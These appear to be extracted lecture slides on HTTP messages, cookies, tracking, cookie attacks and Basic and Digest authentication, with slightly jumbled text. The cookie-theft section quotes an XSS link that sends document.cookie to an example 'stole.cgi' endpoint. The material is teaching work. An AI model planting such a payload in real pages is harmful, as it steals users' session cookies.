two types: request, response http request message: ascii get /somedir/page.html http/1.1 host: ...

Two types: request, response HTTP request message:

ASCII

GET /somedir/page.html HTTP/1.1Host: www.someschool.edu User-agent: Mozilla/4.0Connection: close Accept-language:fr

(extra carriage return, line feed)

Request Command line(GET,

POST, HEAD)

headers

CR+LF tells end ofmessage

POST Method: Necessary if data

exceeds URL length

Data is encoded in message body

Encode data in URLs: Use the GET

command Data is encoded

within URL:

www.somesite.com/animalsearch?monkeys&banana

HTTP/1.0 GET POST HEAD

Ask only for information about a resource

HTTP/1.1 GET, POST, HEAD PUT

File upload DELETE

File deletion

HTTP/1.1 200 OK Connection closeDate: Thu, 06 Aug 1998 12:00:15 GMT Server: Apache/1.3.0 (Unix) Last-Modified: Mon, 22 Jun 1998 …... Content-Length: 6821 Content-Type: text/html data data data data data ...

Status line(error code and

sentence)

Headers

Data, e.g. a HTML document

200 OK request OK, object content follows

301 Moved Permanently The requested object has been moved, find its new

position in the “Location:” header

400 Bad Request What the hell are you saying?

404 Not Found There is no object with such an URL

505 HTTP Version Not Supported

They stay in the first line of the responseSome codes:

Many major Web sites use cookies

Four components:1) Set-Cookie: header line

of HTTP response message

2) Cookie: header line in HTTP request message

3) Cookie file kept on user’s host, managed by user’s browser

4) Possible back-end database at Web site

Example: Susan always accesses

Internet from PC She visits a specific e-

commerce site for first time

When initial HTTP requests arrives at site, site creates: unique ID entry in backend

database for ID

client server

usual http request msg

usual http responseSet-cookie: 1678

usual http request msgcookie: 1678

usual http response msg

usual http request msgcookie: 1678

usual http response msg

cookie-specificaction

cookie-spectific

action

Amazon servercreates ID

1678 for user

create entry

access

acce

ss

Cookies

amazon: 1678ebay: 8734

Cookies

ebay: 8734

Cookies

amazon: 1678ebay: 8734

one week later:

What cookies can help for:

authorization shopping carts recommendations user session state

(e.g. Web e-mail)

Cookies & privacy:• cookies permit sites to

learn a lot about you• the search engines use

redirection and cookies for many purposes

• cookies can be exchanged from one site to another

N.B.

Used to maintain data related to the user during navigation, possibly across multiple visits

Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"), a virtual device into which users can store items they want to purchase as they navigate throughout the site Today the basket contents are stored in a database on the server

side, rather than storing basket items in the cookie itself. A web server typically sends a cookie containing a unique session identifier. The web browser will send back that session identifier with each subsequent request and shopping basket items are stored associated with a unique session identifier

Used to allow users to log into a website Before authentication, the web server will first set a cookie

containing a unique session identifier Users then submit their credentials and the web application

authenticates the session and allows the user access to services

Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future A web server may send a cookie containing the

username last used to log into a website so that it may be filled in for future visits

Many websites use cookies for personalization based on users' preferences. Users select their preferences by entering them in a web

form and submitting the form to the server. The server encodes the preferences in a cookie and

sends the cookie back to the browser. Every time the user accesses a page, the server is also

sent the cookie where the preferences are stored, and can personalize the page according to the user preferences.

Wikipedia website allows authenticated users to choose the webpage skin they like best; the Google search engine once allowed users (even non-registered ones) to decide how many search results per page they want to see

Tracking cookies may be used to track internet users' web browsing

– If the user requests a page of a given site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;

– From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.

– By analyzing the log file collected in the process, it is then possible to find out which pages the user has visited, in what sequence, for how long, no matter of his IP number.

Tracking on a site used to produce statistics Tracking on multiple sites is used to produce anonymous user

profiles• Useful for determining what kind of advertisements should be

shown to users A tracking cookie may violate a user's privacy

• Can be removed, many web browsers offer functionality in this sense

While rendering the page, the browser downloads all these objects. Most modern websites that you view contain information from lots of different sources. While this information is being retrieved, some of these sources may set cookies in your browser First-party cookies are cookies set with the same domain

(or its subdomain) as your browser's address bar. Third-party cookies are cookies set with domains different

from the one shown on the address bar.– Mozilla Firefox, Internet Explorer, Opera and Google

Chrome do allow third-party cookies by default, although users can block them

– Third-Party cookies allow to build ‘constellations’ of web sites and allow to track and build user histories across all the web

In the cookie one can find several attributes: Name/Value This is the only obligatory attribute Domain Used to specify the source domain of the

cookie Expires is optional, used to define the expiration date

of the cookie Can be expressed as a date, as the maximum number of days

or with 'Now' (implies that the cookie is deleted from your computer as soon as your browser is closed) or 'Never' (implies that the cookie is not subject to deadline)

Path specifies the URL path from which the cookie is sent to the end user

Access mode (HttpOnly) makes the cookies invisible to JavaScript and other client-side languages on the page

Secure indicates whether the cookie should be obligatorily transmitted with HTTPS

The cookie setter can specify a deletion date If the cookie setter does not specify a date, the cookie is

removed once the user quits his or her browser. Specifying a date is a way for making a cookie survive

across sessions cookies with an expiration date are called persistent.

A shopping site can use persistent cookies to store the items users have placed in their basket

a cookie can refer an entry in a database stored on the site e-shopping

if users quit their browser without making a purchase and returns later, they later still find the same items in the basket

If these cookies were not given an expiration date, they would expire when the browser is closed

the information about the basket content would be lost Cookies can also be limited in scope to a specific

domain, subdomain or path on the web server which created them

Browsers request a page from web servers by sending them a usually short text called HTTP request. to access the page http://www.example.org/index.html, browsers

connect to the server www.example.org sending it a request that looks like the following one :

GET /index.html HTTP/1.1Host: www.example.org

browser → server

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (content of page)

browser ← server

• The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'. This packet may contain lines requesting the browser to store cookies:

The server sends lines of Set-Cookie only if the server wishes the browser to store cookies.

Set-Cookie is a directive for the browser to store the cookie Send it back in future requests to the if the browser supports

cookies and cookies are enabled. For example, the browser requests the page

http://www.example.org/spec.html by sending the server www.example.org a request like the following

GET /spec.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*

browser → server

• This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one

– The server answers by sending the requested page, possibly adding other cookies as well

– The value of a cookie can be modified by the server by sending a new Set-Cookie: name=newvalue line in response of a page request. The browser then replaces the old value with the new one

Set-Cookie:Name=Value; EXPIRES=Date; PATH=Path; DOMAIN=Domain_Name; [SECURE]

Name=Value is the only specification that is not optional, allows you to assign a name to the

value to be stored in the client

EXPIRES=Date Used to specify a date that defines the lifetime of the cookie. After this date, the

cookie is automatically removed. If not specified, the cookie is destroyed at the end of the user session when the

browser is closed.

DOMAIN=Domain_Name Server Used to identify the domain of the cookie. Only hosts within the specified

domain can set the cookie. If the domain is not specified explicitly, is considered valid the server that

generated the HTTP response.

Set-Cookie:Name=Value; EXPIRES=Date; PATH=Path; DOMAIN=Domain_Name; [SECURE]

PATH=Path. Used to specify the subset of the URL in the domain for which the cookie is

valid. At the time of satisfying an HTTP request, if the cookie has already passed the check on the domain, then the pathname of the URL that is making the request is compared with this value. In case of equality the cookie is considered valid and is sent.

Without specific path is assumed to be the same as described in the header of the document that contains the cookie

SECURE If this clause is added, then the cookie will be sent only if the communications

channel with the host is secure (ie using some technique of secure transmission, for example, the https protocol)

The cookies are identified by a combination of name, domain, and path, in contrast to what provided in

the original specification of Netscape

Cookies are not sent to the server in the case: End user session (closing the browser) if the

cookie is not persistent Has been reached expiration date The expiration date has been reset (by the

server or by a script) to an earlier date, already passed A server or a script explicitly decide to delete it

The browser destroys the cookie in response to a user request

are same as worms and viruses they can generate pop ups They are used for spamming They can only be used for advertising They can erase data from the user's hard

disks They can read personal information stored on

the user's computer Controversial EU directive 2009/136/CE, IT

Law 69-70/2012 seems requiring that web sites MUST ask permission for storing cookies.

Most browsers allow to enable or disable cookies completely to see the cookies currently stored in the

browser to selectively delete the cookies

third-party cookies also include those from unwanted pop-up ads

Used to track users across different sites Building a user profile is potentially

dangerous to your privacy They can be disabled on most

browsers

Inaccurate identification If more than one browser is used on a

computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. Thus, anyone has multiple sets of cookies.

Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser

Cookie hijacking A cookie can be caught from another computer

that is able to read from the network Cookie theft is the act of intercepting cookies

by unauthorized parties Packet sniffing can contain cookies when the

traffic traveling over unencrypted http sessions Can be remedied by using Transport Layer Security

(https) to encrypt the connection Several sites while using https encrypted communications

for user authentication in the later stages, for performance reasons use unencrypted connections. Cookies can be intercepted and the attacker could impersonate a cookie in other sites (cookiemonster attack)

A server can set the secure flag for a cookie. In this case, the browser will only send cookies over a secure channel, such as an SSL connection

Cross-site scripting a cookie that should be only exchanged between a

server and a client is sent elsewhere Make sure that both the browser to send cookies to

malicious server Most browsers allow the execution of pieces of code on the

client machine. If cookies are accessible during execution, their values could be

communicated to the malicious server, which should not actually have access to them.

Encrypting Cookies do not prevent this type of attack It is a typical attack to sites that allow a user to publish

content to html Incorporating the html code into post an attacker could get

cookies from a user This attack can be prevented using the HttpOnly flag,

an option introduced by Microsoft in Internet Explorer 6, you need to make the cookie inaccessible to client-side script

Cookie theft The value of the cookie can be sent to other servers using

means other than the header of a cookie, for example, scripting languages such as JavaScript and JScript can access the values of the cookies and have the ability to send arbitrary values to the servers on the Internet (eg XSS: cross-site scripting)

an attacker may post a message on www.example.com with the following link:

When a user clicks the link, the browser executes the code specified in the onclick replacing the string document.cookie with the list of active user cookies for that page. The list is sent to the server example.com and the attacker will be able to collect the user's cookies

The attack is difficult to identify the user side because the script comes from the same domain that set the cookie

It is the responsibility of the site dell'amministratoire disable the posting of malicious code

Cookies are not directly visible to the client-side JavaScript programs as if they were sent with the HttpOnly flag (non-standard, not supported by all browsers)

<a href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here!</a>

Cookie poisoning An attacker could modify the values of the cookies before you

send them back to the server If a cookie contains the total to pay for items of a transaction, the risk

is that an attacker could change this value and pay less than they should

Many websites fortunately only store a session identifier in the cookie itself, while the other sensitive data are stored on the server, is what puts protected from similar problems

This attack is often used in combination with one cookie theft Cross-site cooking

Enables malicious websites to modify cookies from other sites Similar to cookie poisoning, but the attacker uses normal

users who have some vulnerability in the browser, instead of directly attacking the site

The goal is often realize session fixation (stolen session ID)

Inconsistent state on client and server generate an inconsistency between the state of

the client and the state as stored in the cookie If the user acquires a cookie and then clicks the

"Back" button of the browser, the state on the browser is generally not the same as before that acquisition, but for example the content of the cart may not change; this might not be the intention of the user and can lead to confusion

Cookie expiry Persistent cookies A persistent cookie captured can be used to

simulate a user for a considerable period of time, in the case of session hijacking

IP address Some users may be tracked based on the IP

address of the computer requesting the page The mechanism is less reliable than that of a cookie

to identify a user because computers and proxies can be shared by multiple users, or as they may change from session to session.

It can work in the case of always-on broadband connections that keep the same IP for long periods of time

Some systems, such as Tor, are designed to ensure anonymity on the Internet and make this impractical.

URL (query string) Embedding information into URLs Web server appending query strings to the links of a

Web page it holds when sending it to a browser. When the user follows a link, the browser returns the

attached query string to the server a query string is part of a URL, if that URL is later reused,

the same attached piece of information is sent to the server. even if the same user accesses the same page two times,

there is no guarantee that the same query string is used in both views.

Storing data that identifies a session in a query string enables or simplifies session fixation attacks,referrer logging attacks and other security exploits.

Hidden form fields Using web forms with hidden fields If the form is handled with the HTTP GET

method, the fields actually become part of the URL the browser will send upon form submission.

If the form is handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie

the tracking information is in the HTML source and POST input rather than in the URL the information is not copied when the user copies the

URL

HTTP authentication The HTTP protocol includes the basic access

authentication and the digest access authentication protocols, which allow access to a Web page only when the user has provided the correct username and password.

If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.

In the context of an HTTP transaction, this is a method for a web browser or other client program to provide a user name and password when making a request the user name is appended with a colon and

concatenated with the password. The resulting string is encoded with the Base64 algorithm, for example: username Aladdin and password open sesame the string Aladdin:open sesame is Base64 encoded ,

resulting in QWxhZGRpbjpvcGVuIHNlc2FtZQ==

Encoded string is easily decoded Security is not the intent of the encoding

step the intent of the encoding is to encode

non-HTTP-compatible characters that may be in the user name or password into those that are HTTP-compatible

Is all web browsers support it. Rarely it is used on publicly accessible

Internet web sites but may sometimes be used by small, private systems Programmers and system administrators

sometimes use basic access authentication, in a trusted network environment, to manually test web servers using Telnet or other plain-text network tools

It relies on the assumption that the connection between the client and server computers is secure and can be trusted if SSL/TLS is not used, then the credentials

are passed as plaintext there is no effective way for a server to

"log out" the user without closing the browser

The client requests a page that requires authentication but does not provide a user name and password

the server responds with the 401 ("Unauthorized") response code, including the required authentication scheme and the authentication realm

the client will present the authentication realm (typically a description of the computer or system being accessed) to the user and prompt for a user name and password

once the user has supplied a user name and password, the client adds an Authorization header (with valuebase64encode(username+":"+password)) to the original request and re-sends it

the server accepts the authentication and the page is returned; if the user name is invalid or the password incorrect, the server might return the 401 response code

Client request (no authentication):

GET /private/index.html HTTP/1.0 Host: localhost

Server response:HTTP/1.0 401 Authorization Required Server: HTTPd/1.0 Date: Sat, 27 Nov 2004 10:18:15 GMT WWW-Authenticate: Basic realm="Secure Area" Content-Type: text/html Content-Length: 311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML> <HEAD> <TITLE>Error</TITLE> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> </HEAD> <BODY><H1>401 Unauthorized.</H1></BODY> </HTML>

Client request (user name "Aladdin", password "open sesame"):GET /private/index.html HTTP/1.0 Host: localhost Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==

Server response:

HTTP/1.0 200 OK Server: HTTPd/1.0 Date: Sat, 27 Nov 2004 10:19:07 GMT Content-Type: text/html Content-Length: 10476

Used to negotiate credentials with a user's web browser (using HTTP protocol). It applies a hash function to a password

before sending it over the network, which is safer than basic access authentication, which sends plaintext

is an application of MD5 cryptographic hashing with usage of nonce values to prevent cryptanalysis

If the qop (Quality of Protection) directive is "auth" or unspecified, HA2 is:

If the qop directive is "auth-int" , HA2 is:

If the qop directive is "auth" or "auth-int" , then compute the response as follows:

If the qop directive is unspecified, then compute the response as follows :

The MD5 calculations used in HTTP digest authentication is intended to be "one way" It should be difficult to determine the

original input when only the output is known If the password itself is too simple, however,

then it may be possible to test all possible inputs and find a matching output (a brute-force attack)

HTTP digest authentication is designed to be more secure than traditional digest authentication schemes The password is not used directly in the digest, but

rather HA1 = MD5(username:realm:password). This allows some implementations (e.g. JBoss[3]) to store

HA1 rather than the cleartext password Client nonce was introduced in RFC 2617, which

allows the client to prevent Chosen-plaintext attacks Server nonce is allowed to contain timestamps.

Therefore the server may inspect nonce attributes submitted by clients, to prevent replay attacks.

Server is also allowed to maintain a list of recently issued or used server nonce values to prevent reuse.

Digest access authentication It replaces unencrypted HTTP basic access

authentication but It doesn’t replace strong authentication protocols, such as public-key orKerberos authentication.

Many of the security options in RFC 2617 are optional. If quality-of-protection (qop) is not specified by the server, the client will operate in a security-reduced legacy mode

Digest access authentication is vulnerable to a Man-in-the-middle

For example, a MitM attacker could tell clients to use basic access authentication or legacy RFC2069 digest access authentication mode

Digest access authentication provides no mechanism for clients to verify the server's identity

The client asks for a page that requires authentication but does not provide a username and password

The server responds with the 401 "Unauthorized" response code, providing the authentication realm and a randomly-generated, single-use value called a nonce.

The client will present the authentication to the user and prompt for a username and password

Once a username and password have been supplied, the client re-sends the same request but adds an authentication header that includes the response code

The server accepts the authentication and the page is returned. If the username is invalid and/or the password is incorrect, the server might return the "401" response code

Client request (no authentication):

GET /dir/index.html HTTP/1.0 Host: localhost

Server response:HTTP/1.0 401 Unauthorized Server: HTTPd/0.9 Date: Sun, 10 Apr 2005 20:26:47 GMT WWW-Authenticate: Digest realm="[email protected]", qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41"

Content-Type: text/html Content-Length: 311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML> <HEAD> <TITLE>Error</TITLE> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> </HEAD> <BODY><H1>401 Unauthorized.</H1></BODY> </HTML>

Client request (user name "Mufasa", password "Circle Of Life"):GET /dir/index.html HTTP/1.0 Host: localhost Authorization: Digest username="Mufasa", realm="[email protected]", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/dir/index.html", qop=auth, nc=00000001, cnonce="0a4f113b", response="6629fae49393a05397450978507c4ef1", opaque="5ccc069c403ebaf9f0171e9517f40e41"

Server response:

HTTP/1.0 200 OK Server: HTTPd/0.9 Date: Sun, 10 Apr 2005 20:27:03 GMT Content-Type: text/html Content-Length: 7984

The "response" value is calculated in three steps:1. The MD5 hash of the combined username, authentication realm

and password is calculated. The result is referred to as HA1.2. The MD5 hash of the combined method and digest URI is

calculated, e.g. of "GET" and "/dir/index.html". The result is referred to as HA2.

3. The MD5 hash of the combined HA1 result, server nonce (nonce), request counter (nc), client nonce (cnonce), quality of protection code (qop) and HA2 result is calculated. The result is the "response" value provided by the client.

HA1 = MD5( "Mufasa:[email protected]:Circle Of Life" ) =939e7578ed9e3c518a452acee763bce9 HA2 = MD5( "GET:/dir/index.html" ) = 39aff3a2bab6126f332b942af96d3366 Response = MD5( "939e7578ed9e3c518a452acee763bce9: \ dcd98b7102dd2f0e8b11d0f600bfb0c093:\ 00000001:0a4f113b:auth:\ 39aff3a2bab6126f332b942af96d3366" ) = 6629fae49393a05397450978507c4ef1

At this point the client may make another request, reusing the server nonce value but providing a new client nonce (cnonce).

For subsequent requests, the hexadecimal request counter (nc) must be greater than the last value it used – otherwise an attacker could simply "replay" an old request with the same credentials

It is up to the server to ensure that the counter increases for each of the nonce values that it has issued, rejecting any bad requests appropriately.

The server should remember nonce values that it has recently generated. It may also remember when each nonce value was issued, expiring them after a certain amount of time he server does not need to keep any expired nonce values, but

it can simply assume that any unrecognised values have expired.

two types: request, response http request message: ascii get /somedir/page.html http/1.1 host: ...

Documents